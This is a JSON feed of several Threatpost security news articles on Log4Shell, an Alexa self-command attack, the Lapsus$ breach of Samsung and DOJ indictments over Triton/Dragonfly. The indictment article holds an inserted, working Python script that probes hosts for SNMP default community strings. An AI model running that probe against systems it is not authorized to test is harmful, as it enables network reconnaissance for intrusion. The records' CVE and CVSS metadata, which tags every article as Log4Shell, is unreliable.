\n_** \n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T19:00:01", "type": "threatpost", "title": "Where the Latest Log4Shell Attacks Are Coming From", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T19:00:01", "id": "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "href": "https://threatpost.com/log4shell-attacks-origin-botnet/176977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T18:32:41", "description": "UPDATE\n\nResearchers from the University of London and the University of Catania have discovered how to weaponize Amazon Echo devices to hack themselves.\n\nThe \u2013 dubbed \u201cAlexa vs. 
Alexa\u201d \u2013 leverages what the researchers called \u201ca command self-issue vulnerability\u201d: using pre-recorded messages which, when played over a 3rd\u2013 or 4th-generation Echo speaker, causes the speaker to perform actions on itself.\n\n## How to Make Alexa Hack Itself\n\nSmart speakers lay dormant during the day, waiting for a user to vocalize a particular activation phrase: i.e., \u201cHey, Google,\u201d \u201cHey, Cortana\u201d or, for the Amazon Echo, \u201cAlexa,\u201d or simply, \u201cEcho.\u201d Usually, of course, it\u2019s the device\u2019s owner who issues such commands.\n\nHowever, researchers found that \u201cself-activation of the Echo device [also] happens when an audio file reproduced by the device itself contains a voice command.\u201d And even if the device asks for a secondary confirmation, in order to perform a particular action, \u201cthe adversary only has to always append a \u2018yes\u2019 approximately six seconds after the request to be sure that the command will be successful.\u201d\n\nTo get the device to play a maliciously crafted recording, an attacker would need a smartphone or laptop in Bluetooth-pairing range. Unlike internet-based attacks, this scenario requires proximity to the target device. This physical impediment is balanced by the fact that, as the researchers noted, \u201conce paired, the Bluetooth device can connect and disconnect from Echo without any need to perform the pairing process again. Therefore, the actual attack may happen several days after the pairing.\u201d\n\nAlternatively, the report stated, attackers could use an internet radio station, beaming to the target Echo like a command-and-control server. 
This method \u201cworks remotely and can be used to control multiple devices at once,\u201d but would required extra steps, including tricking the targeted user into downloading a malicious [Alexa \u201cskill\u201d](<https://threatpost.com/researchers-hacked-amazons-alexa-to-spy-on-users-again/131401/>) (app) to an Amazon device.\n\nUsing the Alexa vs. Alexa attack, attackers could tamper with applications downloaded to the device, make phone calls, place orders on Amazon, eavesdrop on users, control other connected appliances in a user\u2019s home and more.\n\n\u201cThis action can undermine physical safety of the user,\u201d the report stated, \u201cfor example, when turning off the lights during the evening or at nighttime, turning on a smart microwave oven, setting the heating at a very high temperature or even unlocking the smart lock for the front door.\u201d\n\nIn testing their attack, the authors were able to remotely turn off the lights in one of their own homes 93 percent of the time.\n\n## Smart Speakers Are Uniquely Vulnerable\n\nBecause they\u2019re always listening for their wake word, and because they\u2019re so often interconnected with other devices, smart speakers are prone to unique security vulnerabilities. The Echo series of devices, in particular, has been linked with a series of privacy risks, from microphones \u201c[hearing](<https://threatpost.com/hey-alexa-who-messaging/162587/>)\u201d what people text on nearby smartphones to audio recordings being stored [indefinitely](<https://threatpost.com/amazon-admits-alexa-voice-recordings-saved-indefinitely/146225/>) on company servers.\n\nThe physical proximity required for Bluetooth, or having to trick users into downloading malicious skills, limits but does not eliminate the potential for harm in such a scenario as the Alexa vs. Alexa report described, according to John Bambenek, principal threat hunter at Netenrich. 
Those living in dense cities are potentially at risk, and individuals “at most risk are those in domestic violence scenarios,” he wrote, via email. For that reason, “simply accepting the risk isn’t acceptable.”

The research prompted Amazon to patch the command self-issue vulnerability, an outcome that illustrates the benefit of having a robust threat-hunting culture.

“Most people aren’t evil,” wrote Bambenek. “It is hard to test new technology against criminal intent because even testers lack the criminal mindset (and that’s a good thing for society). As technology gets adopted, we find things we overlook and make it better.”

For its part, Amazon gave Threatpost the following statement:

_“At Amazon, privacy and security are foundational to how we design and deliver every device, feature, and experience. We appreciate the work of independent security researchers who help bring potential issues to our attention, and are committed to working with them to secure our devices. We fixed the remote self-wake issue with Alexa Skills caused by extended periods of silence resulting from break tags as demonstrated by the researchers. We also have systems in place to continually monitor live skills for potentially malicious behavior, including silent re-prompts. Any offending skills we identify are blocked during certification or quickly deactivated, and we are constantly improving these mechanisms to further protect our customers.”_

The latest, patched version of Alexa device software can be found [here](<https://www.amazon.com/gp/help/customer/display.html?nodeId=GMB5FVUB6REAVTXY&linkCode=sl2&tag=hothard-20&linkId=070200dafa741d26cbd19cf21d735449&language=en_US&ref_=as_li_ss_tl>).

_This posting was updated on March 8 at 1:30 p.m. ET to include Amazon’s statement._

**_Moving to the cloud?
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, “Cloud Security: The Forecast for 2022.”_** **_We explore organizations’ top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**

", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T21:30:12", "type": "threatpost", "title": "Novel Attack Turns Amazon Devices Against Themselves", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T21:30:12", "id": "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "href": "https://threatpost.com/attack-amazon-devices-against-themselves/178797/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T19:35:26", "description": "

Just days after leaking data it claims to have exfiltrated from chipmaker NVIDIA, ransomware group Lapsus$ is claiming another international company among its victims — this time
releasing data purportedly stolen from Samsung Electronics.

The consumer electronics giant confirmed in a [media statement](<https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code>) on Monday that a “security breach” had occurred involving internal company data, but said that customer and employee data were not impacted.

Lapsus$ had earlier announced on its Telegram channel that it had [breached Samsung](<https://securityaffairs.co/wordpress/128712/cyber-crime/samsung-electronics-lapsus-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=samsung-electronics-lapsus-ransomware>) and offered a taste of what it had as proof, including biometric authentication information and source code from both Samsung and one of its suppliers, Qualcomm. That’s according to Security Affairs, which also published a screen grab of the data leak.

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg>)

Screen capture of the Telegram message with data. Source: Security Affairs.

“If Samsung’s keys were leaked, it could compromise the TrustZone environment on Samsung devices that stores especially sensitive data, like biometrics, some passwords and other details,” said Casey Bisson, head of product and developer relations at BluBracket, via email. “The TrustZone environment is useful because it creates a strong security barrier to attacks by Android malware.”

He added that if the leaked data allows malware to access the TrustZone environment, it could make all data stored there vulnerable.

“If Samsung has lost control of the signing keys, it could make it impossible for Samsung to securely update phones to prevent attacks on the TrustZone environment,” he said. “Compromised keys would make this a more significant attack [than NVIDIA](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), given the number of devices, their connection to consumers, and amount of very sensitive data that phones have.”

## **Ransomware Is Here to Stay**

Obviously, the implications of source code and thousands of employee credentials out in the open are serious. The [ransomware attacks](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>) on Samsung and NVIDIA, and even January’s Lapsus$ attack on media outlets in Portugal, SIC Noticias and Expresso, should serve as a grim reminder that the [ransomware](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) business is booming, according to experts.

> The websites of two of the main media organizations in Portugal [@expresso](<https://twitter.com/expresso?ref_src=twsrc%5Etfw>) and [@SICNoticias](<https://twitter.com/SICNoticias?ref_src=twsrc%5Etfw>) are down, after an apparent hacking, according to their parent company, Impresa. [pic.twitter.com/la2Pi9JRgG](<https://t.co/la2Pi9JRgG>)
>
> — Mia Alberti (@mialberti) [January 2, 2022](<https://twitter.com/mialberti/status/1477622312098840581?ref_src=twsrc%5Etfw>)

“Ransomware is not going away,” Dave Pasirstein, CPO and head of engineering for TruU, told Threatpost by email. “It’s a lucrative business that is nearly impossible to protect all risk vectors; however, it is made easy by enterprises failing to take enough precautionary steps.”

## **Ransomware Risk Vectors Abound**

Those steps, according to Pasirstein, must include a zero-trust approach, an effective patching strategy, endpoint and email protection, employee training and strong authentication such as modern MFA. He added, “ideally, a password-less MFA that is not based on shared secrets and thus, cannot easily be bypassed by a server compromise.”

The group’s recent successes also highlight the need to protect data across the organization, Purandar Das, CEO of Sotero, told Threatpost.

“Obviously a very concerning development for Samsung and NVIDIA if true,” he said. “What this also demonstrates is the vulnerability of data in any data store within organizations.”

He explained that a common security approach is to focus on locking down structured data storage, which can be shortsighted.

“Most security has been focused on structured datastores with the assumption that the attackers are looking for confidential information that relates to individuals whether they are customers, consumers or employees,” Das added. “However, confidential or sensitive data is spread in more than just structured data stores.”

In the case of Samsung, beyond releasing the company’s competitive secrets, the Lapsus$ breach leaves the company open to future compromise, he warned.

“In the case of Samsung, it would provide a pathway into any or many Samsung devices rendering them vulnerable in ways that wouldn’t have been feasible,” Das said. “Security, or more importantly data-focused security, is essential. Securing the data is probably more critical or just as critical as today’s security of attempting to lock down the perimeter.”

**_Register Today for [Log4j Exploit: Lessons Learned and Risk Reduction Best Practices](<https://bit.ly/3BXPL6S>) – a LIVE Threatpost event scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code expert Justin Young as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security.
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._**

", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T19:28:36", "type": "threatpost", "title": "Samsung Confirms Lapsus$ Ransomware Hit, Source Code Leak", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T19:28:36", "id": "THREATPOST:14D52B358840B9265FED987287C1E26E", "href": "https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T23:16:23", "description": "

The U.S.
Department of Justice (DOJ) has [indicted](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>) four Russian government employees in connection with plots to attack critical infrastructure in the United States and beyond, including at least one nuclear power plant.

The campaigns involved one of the most dangerous malware families ever encountered in the operational technology (OT) and energy sectors: Triton, aka Trisis, Russia-linked malware used to shut down an oil refinery in 2017 and deployed against [another Mideast target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) in 2019.

Two related indictments were unsealed yesterday: one that named Evgeny Viktorovich Gladkikh ([PDF](<https://www.justice.gov/opa/press-release/file/1486831/download>)), an employee of the Russian Ministry of Defense, and another ([PDF](<https://www.justice.gov/opa/press-release/file/1486836/download>)) that named three officers in Military Unit 71330 – or “Center 16” – of Russia’s Federal Security Service (FSB), the successor to the KGB.

Center 16 is the FSB’s main structural unit for signals intelligence, consisting of a central unit housed in unmarked administrative buildings spread across Moscow and secluded forest enclosures, with massive satellite dishes pointing out to listen to the world. It’s known to cybersecurity researchers as “Dragonfly,” “Energetic Bear” and “Crouching Yeti.”

## $10M Reward for Intel on FSB Officers

There’s a reward on the heads of the trio of FSB officers for their alleged intrusions into energy-sector networks. The State Department [said](<https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-fsb-officers-conducting-malicious-activity-against-u-s-critical-infrastructure-between-2012-2017/>) on Thursday that its Rewards for Justice (RFJ) program is offering $10 million for information on the three: Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov and Marat Valeryevich Tyukov.

The officers were allegedly involved in computer intrusions, wire fraud, aggravated identity theft and damage to an energy facility. The reward marks the first time that RFJ has named foreign government security personnel under its critical infrastructure reward offer, the State Department said.

## Triton/Trisis

Triton was allegedly used in campaigns run between May and September 2017.

Researchers have compared Triton’s targeting of industrial control systems (ICS) to the malware used in the watershed attacks [Stuxnet](<https://threatpost.com/stuxnets-first-five-victims-provided-path-to-natanz/109291/>) and Industroyer/Crashoverride, the latter a backdoor that targets ICS and that caused a power outage in Kiev in 2016. In 2018, research revealed that Industroyer [was linked](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) to the massive [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) ransomware outbreak that crippled organizations around the world the year before.

According to the indictment, between May and September 2017, Gladkikh, a 36-year-old computer programmer employed by an institute affiliated with the Russian Ministry of Defense, was involved in a campaign to hack global energy facilities “using techniques designed to enable future physical damage with potentially catastrophic effects.” The hacking allegedly led to two separate emergency shutdowns at a foreign facility.

Along with co-conspirators, Gladkikh allegedly hacked the systems of “a foreign refinery” (presumably Saudi oil giant Petro Rabigh) in 2017 and installed Triton/Trisis malware on a safety system produced by Schneider Electric. Triton takes its name from the fact that it’s designed to target Triconex safety instrumented system (SIS) controllers, which are sold by Schneider Electric. Triton surfaced again in 2019, when it was [used to target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) an undisclosed company in the Middle East.

Triton was designed to prevent the refinery’s safety systems from functioning – “by causing the ICS to operate in an unsafe manner while appearing to be operating normally,” the DOJ said – thereby leaving the refinery open to damage and jeopardizing anybody nearby. A safety instrumented system is the independent layer that is supposed to bring a process to a safe state when the normal control system fails, so defeating it removes the last automated safeguard against a release, fire or explosion.

“When the defendant deployed the Triton malware, it caused a fault that led the refinery’s Schneider Electric safety systems to initiate two automatic emergency shutdowns of the refinery’s operations,” the DOJ said. Between February and July 2018, Gladkikh and his crew allegedly researched and (unsuccessfully) tried to hack the computer systems used by a U.S. company with similar refineries.

As energy news outlet E&E News [reported](<https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/>) in 2019, in the early evening of Aug. 4, 2017, two emergency shutdown systems sprang to life at Petro Rabigh’s sprawling refinery along Saudi Arabia’s Red Sea coast. Engineers working the weekend shift were oblivious, even as the systems knocked the complex offline “in a last-gasp effort to prevent a gas release and deadly explosion.”

“[They] spotted nothing out of the ordinary, either on their computer screens or out on the plant floor,” according to E&E News.

Gladkikh has been charged with three counts: conspiracy to cause damage to an energy facility, attempt to damage an energy facility, and conspiracy to commit computer fraud.

## FSB Officers’ Indictment: The Dragonfly Supply-Chain Attack

The indictment that names the FSB officers alleges that, between 2012 and 2017, Akulov, Gavrilov, Tyukov and their co-conspirators engaged in computer intrusions, including supply-chain attacks, “in furtherance of the Russian government’s efforts to maintain surreptitious, unauthorized and persistent access to the computer networks of companies and organizations in the international energy sector, including oil and gas firms, nuclear power plants, and utility and power transmission companies.”

Specifically, they allegedly targeted the software and hardware that controls equipment in power generation facilities, known as ICS or Supervisory Control and Data Acquisition (SCADA) systems.

“Access to such systems would have provided the Russian government the ability to, among other things, disrupt and damage such computer systems at a future time of its choosing,” according to the DOJ’s [press release](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>).

The indictment describes a campaign against the energy sector that involved two phases. The first was a supply-chain attack commonly referred to as “Dragonfly” or “Havex” by security researchers. Dragonfly took place between 2012 and 2014 and compromised the computer networks of ICS/SCADA system manufacturers and software vendors.

It involved tucking the Havex remote-access trojan (RAT) [inside legitimate software updates](<https://threatpost.com/ics-malware-found-on-vendors-update-installers/106910/>). According to a 2014 advisory from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the Havex RAT targeted vendors via phishing campaigns, website redirects and, finally, by infecting the software installers. Three vendor websites were compromised in watering-hole attacks, the ICS-CERT advisory said.

“After unsuspecting customers downloaded Havex-infected updates, the conspirators would use the malware to, among other things, create backdoors into infected systems and scan victims’ networks for additional ICS/SCADA devices,” according to the DOJ. The gang allegedly managed to install malware on more than 17,000 unique devices in the United States and abroad, including ICS/SCADA controllers used by power and energy companies.

## Dragonfly 2.0: Spearphishing a Nuclear Power Plant

Between 2014 and 2017, the campaign entered what’s commonly referred to as “Dragonfly 2.0,” wherein the suspects allegedly turned their focus to specific energy-sector entities and to the individuals and engineers who worked with ICS/SCADA systems.

This second phase entailed spearphishing attacks targeting more than 3,300 users at more than 500 U.S. and international companies and entities, in addition to U.S. government agencies such as the Nuclear Regulatory Commission.

The spearphishing attacks sometimes struck gold, including in the compromise of the business network (i.e., computers not directly connected to ICS/SCADA equipment) of the Wolf Creek Nuclear Operating Corporation (Wolf Creek) in Burlington, Kansas. Wolf Creek operates a nuclear power plant.

“Moreover, after establishing an illegal foothold in a particular network, the conspirators typically used that foothold to penetrate further into the network by obtaining access to other computers and networks at the victim entity,” according to the DOJ.

Dragonfly 2.0 also entailed a watering-hole attack wherein the alleged attackers exploited publicly known vulnerabilities in [content management software](<https://threatpost.com/threatlist-wordpress-vulnerabilities/140690/>) (CMS) to compromise servers that hosted websites commonly visited by ICS/SCADA system and other energy-sector engineers. “When the engineers browsed to a compromised website, the conspirators’ hidden scripts deployed malware designed to capture login credentials onto their computers,” the DOJ said.

The campaign targeted victims in the United States and in more than 135 other countries, the Feds said.

The FSB officers face charges of conspiracy to cause damage to the property of an energy facility and commit computer fraud and abuse, and conspiracy to commit wire fraud. Akulov and Gavrilov are also charged with substantive counts of wire fraud and computer fraud related to unlawfully obtaining information from computers and causing damage to computers, and with three counts of aggravated identity theft.

## Still Gaping Security Holes in Energy Companies

LookingGlass CEO Gilman Louie, an expert on national security and cybersecurity who regularly shares or analyzes intel with government agencies, told Threatpost on Friday that legal actions against the potential operators of the critically dangerous Triton malware are welcome: They’re a “positive move [that] sends a strong message to cybercrime and nation-state actors globally,” he said via email.

On the less-positive side, a recent LookingGlass cyber profile of the U.S. energy sector looks grim.

Many energy companies are sitting ducks, with current cybersecurity exposures that have already been exploited by Russian actors in the past, including open ports that enable threat actors to gain full remote access.

The report shares vulnerabilities and exposures that Russian hackers are known to have used. “For years, energy companies have been hammered on securing their operational technology. The Triton attacks show why this is important,” Louie noted.

But he stated that “organizations also need to ensure they’re improving security on their traditional IT side.” He pointed to the Colonial Pipeline attack as an example of how adversaries “didn’t need in-depth knowledge of [operational technology, or OT] to shut down the flow of gas or oil.”

LookingGlass research shows that, across the energy sector, there are vulnerabilities more than five years old that haven’t been dealt with, and open ports like remote desktop that are “basically unprotected doors into an organization.”

Energy companies need to be patching or updating their systems, Louie said, and shutting those open doors: “If they really need a port open for remote desktop, then they need to add layers of compensating security controls to make sure it’s not easy to exploit.”

When unsealing the indictments, the government noted that it’s taking action to [enhance private sector network defense efforts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-083a>) and to [disrupt similar malicious activity](<https://protect2.fireeye.com/v1/url?k=73f0be82-2c6b867e-73f79a67-ac1f6b01771c-a72e8f7b8ceb667b&q=1&e=d2252912-db07-4b30-8381-4dbd442acfc0&u=https%3A%2F%2Frewardsforjustice.net%2Findex%2F%3Fjsf%3Djet-engine%3Arewards-grid%26tax%3Dcyber%3A857>).

Other security issues that Russian actors have leveraged, which companies need to address immediately before they are used for attacks that could be bigger than those we’ve already seen, include:

* **Default Passwords**: Exactly what it sounds like. Default passwords are a major attack vector. Leaving them unchanged, especially on a service like Telnet, which also carries the login in the clear, leaves companies wide open to Russian access to their networks.
* [**Port 161 – SNMP**](<https://www.cisa.gov/uscert/nc

as/alerts/TA18-106A>): The Simple Network Management Protocol (SNMP) uses UDP port 161 for requests to devices and port 162 for the traps (notifications) devices send back, and Russian actors have used it to gain access to network devices and infrastructure. Older versions of the protocol (v1 and v2c) authenticate with a plaintext “community string,” often left at a default such as “public,” so threat actors can eavesdrop on or manipulate device configuration data.
* **Port 139/445 – SMB**: The SMB ports (TCP 139 and 445) are commonly used for file sharing. Russian groups have successfully targeted them to execute remote code and to steal information, LookingGlass found.

These are just a few examples of security exposures that threat actors tied directly to Russia have exploited and will likely exploit again within U.S. companies, according to LookingGlass’s research.

It’s not time to wait for a nuclear-level cyber event, given that threat actors are already inside the power infrastructure. Now’s the time for companies to find and mitigate the holes that let them in, Louie said.

“Energy sector entities should be reviewing their digital footprint and taking action to secure their external-facing assets, especially as the threat of Russian cyberattacks intensifies,” he said.
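As an added example (not LookingGlass’s, CISA’s or the DOJ’s code), here is the check a practitioner would run to confirm the SNMP exposure in the list above: a hand-encoded SNMPv1 GetRequest for `sysDescr.0`, sent with the factory-default community strings. Any device that answers has just proved it accepts an unauthenticated, plaintext credential from the network, which is exactly the eavesdropping and manipulation problem the advisory describes. The OID, the community strings and the packet layout are the protocol’s own; the target host, the timeouts and the constructed GetResponse used to exercise the parser offline are assumptions made for this example.

```python
import socket

# Added example: a minimal SNMPv1 default-community probe, BER-encoded by hand so it needs no
# third-party modules. Hypothetical tool for illustration; the traffic it builds is standard SNMPv1.
SYS_DESCR_OID = (1, 3, 6, 1, 2, 1, 1, 1, 0)   # sysDescr.0 from SNMPv2-MIB
DEFAULT_COMMUNITIES = ("public", "private")    # the factory defaults worth testing for


def _ber_len(n):
    """BER length: short form below 128, otherwise 0x8N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body


def _int(v):
    """ASN.1 INTEGER for non-negative v: two's complement, leading 0x00 when the top bit is set."""
    return _tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def _oid(arcs):
    """ASN.1 OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128 big-endian."""
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return _tlv(0x06, bytes(out))


def build_get_request(community, oid=SYS_DESCR_OID, request_id=0x1234):
    """Message { version 0, community, GetRequest-PDU [0] { id, err 0, idx 0, { { oid, NULL } } } }."""
    varbind = _tlv(0x30, _oid(oid) + _tlv(0x05, b""))
    pdu = _tlv(0xA0, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, varbind))
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)


def build_get_response(community, oid, value, request_id=0x1234, error_status=0):
    """What an agent answers with an OCTET STRING value; used here to construct test traffic offline."""
    varbind = _tlv(0x30, _oid(oid) + _tlv(0x04, value))
    pdu = _tlv(0xA2, _int(request_id) + _int(error_status) + _int(0) + _tlv(0x30, varbind))
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)


def _read_tlv(buf, pos):
    """Return (tag, body, next_pos); raises IndexError on truncated input."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_get_response(packet):
    """Decode a GetResponse into a dict; None for non-SNMP, non-GetResponse or truncated input."""
    try:
        tag, msg, _ = _read_tlv(packet, 0)
        if tag != 0x30:
            return None
        _, _version, pos = _read_tlv(msg, 0)
        _, community, pos = _read_tlv(msg, pos)
        tag, pdu, _ = _read_tlv(msg, pos)
        if tag != 0xA2:                      # only GetResponse-PDU is interesting
            return None
        _, req_id, pos = _read_tlv(pdu, 0)
        _, err, pos = _read_tlv(pdu, pos)
        _, _idx, pos = _read_tlv(pdu, pos)
        _, varbinds, _ = _read_tlv(pdu, pos)
        _, vb, _ = _read_tlv(varbinds, 0)
        _, _oid_bytes, pos = _read_tlv(vb, 0)
        _, value, _ = _read_tlv(vb, pos)
    except IndexError:
        return None
    return {"community": community.decode(errors="replace"),
            "request_id": int.from_bytes(req_id, "big", signed=True),
            "error_status": int.from_bytes(err, "big", signed=True),
            "value": value}


def probe(host, communities=DEFAULT_COMMUNITIES, timeout=2.0):
    """Try each default community against UDP/161; a GetResponse with error-status 0 is a finding."""
    findings = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for i, community in enumerate(communities):
            rid = 0x1000 + i                 # distinct id per attempt so late replies are not confused
            s.sendto(build_get_request(community, request_id=rid), (host, 161))
            try:
                data, _ = s.recvfrom(4096)
            except socket.timeout:
                continue                     # SNMPv1 agents silently drop requests with a wrong community
            reply = parse_get_response(data)
            if reply and reply["request_id"] == rid and reply["error_status"] == 0:
                findings.append((community, reply["value"].decode(errors="replace")))
    return findings


if __name__ == "__main__":
    import sys
    for community, descr in probe(sys.argv[1]):
        print(f"{sys.argv[1]} answers community '{community}': {descr}")
```

Run it only against hosts you own or are authorized to test. A hit on `public` or `private` means the device should be moved to SNMPv3 with authentication and privacy, or at minimum given a unique community and have UDP/161 filtered at the perimeter; because SNMPv1 and v2c send the community string in the clear, a passive observer on the path learns it just as easily as this active probe does.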
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-25T21:25:17", "type": "threatpost", "title": "DOJ Indicts Russian Gov\u2019t Employees Over Targeting Power Sector", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-25T21:25:17", "id": "THREATPOST:138507F793D8399AF0EE1640C46A9698", "href": "https://threatpost.com/doj-indicts-russian-govt-employees-over-targeting-power-sector/179108/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T18:35:15", "description": "

Russia is offering its own trusted Transport Layer Security (TLS) certificate authority (CA) to replace certificates that need to be renewed by
foreign certificate authorities. Sanctions imposed in the wake of Russia’s invasion of Ukraine are gumming up its citizens’ access to websites: Russian sites are stuck, unable to renew their certs, because the sanctions leave signing authorities in many countries unable to accept payments from Russia, according to [BleepingComputer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>).

